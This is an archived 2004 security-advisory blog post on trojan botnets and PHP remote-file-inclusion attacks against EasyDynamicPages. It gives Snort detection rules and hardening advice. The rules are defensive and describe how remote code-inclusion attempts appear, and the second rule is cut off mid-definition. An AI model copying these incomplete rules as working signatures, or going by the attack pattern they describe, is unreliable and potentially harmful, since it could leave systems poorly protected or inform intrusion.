Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-10-09 InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Botnets, PHP includes

Published: 2004-10-09
Last Updated: 2004-10-10 00:26:49 UTC
by Erik Fichtner (Version: 1)
0 comment(s)
Still More Botnets:

We're receiving yet more reports of successful social engineering attacks and
GDI+ JPEG attacks that cause a UPX'ed and Morphine'd trojan horse (Gaobot, SDbot,
RxBot) to be installed, and the resultant botnet used for typical nefarious

Most current AntiVirus packages don't properly unpack these binaries, and don't
detect them terribly well. There are also reports that some of them are
interfering with automated AV update procedures.

Patches applied to both the computer itself and the user at the console should be
sufficient. If you have the facility to capture, or block, IRC traffic to
unknown IRC servers (sometimes not on port 6667/tcp, either), you can potentially
disrupt the botnet.


We received a report of a webserver being compromised via a long-standing
problem with a PHP script package; EasyDynamicPages:

The following Snort rule should catch attempts:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasyDynamicPages exploit"; \
classtype:web-application-activity; sid:900018; rev:1; \
reference:url,; reference:cve,CAN-2004-0073; \
flow:established,to_server; uricontent:"edp_relative_path=";)

Also, be aware that EDP isn't the only vector to this vulnerability. Any PHP
page that arbitrarily include()'s from a variable that can be filled in by
a remote attacker can be exploited in a similar way:

Perhaps a more generic method might be to search for URL's in your URI's,
which shouldn't happen unless you're proxying or doing odd redirects,
which happens far more often than it really should. YMMV.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg: "handlers experimental -- URL in URI proxying with arg stacking"; \
classtype:string-detect; sid:900019; rev:1; priority:4; flow:to_server,established; tag:host,90,seconds; \

At any rate, if you're a PHP developer, you should probably triplecheck your code
to make sure that an attacker can't feed you a URL like this, and if you have PHP
on your server, you should probably disable allow_url_fopen if you haven't

0 comment(s)
Diary Archives